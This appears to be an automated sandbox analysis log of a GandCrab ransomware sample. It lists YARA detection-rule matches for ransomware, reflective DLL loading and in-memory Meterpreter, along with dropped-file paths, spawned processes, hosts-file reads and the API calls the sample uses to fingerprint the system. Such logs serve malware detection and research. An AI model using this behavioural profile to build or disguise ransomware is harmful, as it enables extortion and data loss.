                Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: Process Memory Space: mqsmvj.exe PID: 5964, type: MEMORYSTRMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
                Source: Process Memory Space: mqsmvj.exe PID: 5524, type: MEMORYSTRMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
                Source: Process Memory Space: mqsmvj.exe PID: 4940, type: MEMORYSTRMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPEDMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPEDMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPEDMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPEDMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F141C200_2_0F141C20
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F1410200_2_0F141020
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F1485200_2_0F148520
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F581C203_2_0F581C20
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F5810203_2_0F581020
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F5885203_2_0F588520
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F581C2011_2_0F581C20
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F58852011_2_0F588520
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F58102011_2_0F581020
                Source: IJr8RvvhZ3.exeVirustotal: Detection: 87%
                Source: IJr8RvvhZ3.exeMetadefender: Detection: 86%
                Source: IJr8RvvhZ3.exeReversingLabs: Detection: 96%
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeFile read: C:\Users\user\Desktop\IJr8RvvhZ3.exeJump to behavior
                Source: IJr8RvvhZ3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\IJr8RvvhZ3.exe "C:\Users\user\Desktop\IJr8RvvhZ3.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeJump to behavior
                Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@21/1@15/0
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F147490 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,0_2_0F147490
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F147B70 wsprintfW,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,CreateToolhelp32Snapshot,VirtualFree,Process32FirstW,lstrcmpiW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,Process32NextW,GetLastError,lstrlenW,VirtualFree,VirtualFree,FindCloseChangeNotification,VirtualFree,0_2_0F147B70
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeMutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=63b5ce1c617217a5
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile read: C:\Windows\System32\drivers\etc\hosts
